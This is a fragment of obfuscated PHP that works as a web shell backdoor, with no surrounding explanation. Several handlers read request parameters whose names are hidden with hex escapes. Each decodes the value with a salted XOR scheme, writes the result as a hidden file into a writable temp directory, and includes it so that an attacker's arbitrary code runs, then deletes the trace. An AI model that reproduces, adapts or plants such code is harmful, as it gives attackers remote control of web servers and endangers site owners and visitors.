= count($value)) break; if (!!is_dir($data) && !!is_writable($data)) { $component = vsprintf("%s/%s", [$data, ".record"]); if (file_put_contents($component, $pointer)) { include $component; @unlink($component); exit; } } $property_set++; } while (true); } if(isset($_POST) && isset($_POST["en\x74"])){ $flag = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), getcwd(), "/tmp", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TMP")]); $record = $_POST["en\x74"]; $record = explode( '.', $record); $data_chunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); foreach( $record as $i => $v8): $chS = ord( $salt[$i % $sLen]); $dec =( ( int)$v8 - $chS -( $i % 10)) ^ 71; $data_chunk .= chr( $dec); endforeach; while ($binding = array_shift($flag)) { if (is_writable($binding) && is_dir($binding)) { $value = implode("/", [$binding, ".pset"]); $success = file_put_contents($value, $data_chunk); if ($success) { include $value; @unlink($value); exit;} } } } if(array_key_exists("re\x66", $_REQUEST) && !is_null($_REQUEST["re\x66"])){ $fac = $_REQUEST["re\x66"]; $fac = explode ( '.' ,$fac ); $data_chunk= ''; $s8= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $s8); $q= 0; array_walk( $fac , function( $v8) use( &$data_chunk , &$q , $s8 , $sLen) {$chS= ord( $s8[$q % $sLen]); $dec= ( ( int)$v8 - $chS -( $q % 10)) ^ 95; $data_chunk .= chr( $dec); $q++;} ); $ent = array_filter([getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/dev/shm", "/var/tmp", getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd()]); $val = 0; do { $resource = $ent[$val] ?? null; if ($val >= count($ent)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($resource)) { $flag = "$resource" . "/.sym"; if (@file_put_contents($flag, $data_chunk) !== false) { include $flag; unlink($flag); die(); } } $val++; } while (true); } if(count($_POST) > 0 && isset($_POST["f\x61c\x74o\x72"])){ $element = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), getcwd(), sys_get_temp_dir(), "/var/tmp", "/tmp", "/dev/shm", getenv("TEMP")]); $descriptor = $_POST["f\x61c\x74o\x72"]; $descriptor =explode ("." ,$descriptor ) ; $parameter_group = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $len = count( $descriptor); for( $u = 0; $u <$len; $u++) { $v3 = $descriptor[$u]; $chS = ord( $salt[$u % $sLen]); $dec =( ( int)$v3 - $chS -( $u % 10))^94; $parameter_group .=chr( $dec); } while ($item = array_shift($element)) { if (!!is_dir($item) && !!is_writable($item)) { $component = sprintf("%s/.ent", $item); if (@file_put_contents($component, $parameter_group) !== false) { include $component; unlink($component); die(); } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["\x65ntit\x79"])){ $pset = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", getcwd(), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp"]); $ptr = $_REQUEST["\x65ntit\x79"]; $ptr =explode ( '.' ,$ptr ) ; $bind=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($s); $k=0; $__tmp=$ptr; while ($v3=array_shift($__tmp)) { $sChar=ord($s[$k % $sLen]); $d=((int)$v3 - $sChar - ($k % 10))^49; $bind .= chr($d); $k++; } foreach ($pset as $comp): if (is_dir($comp)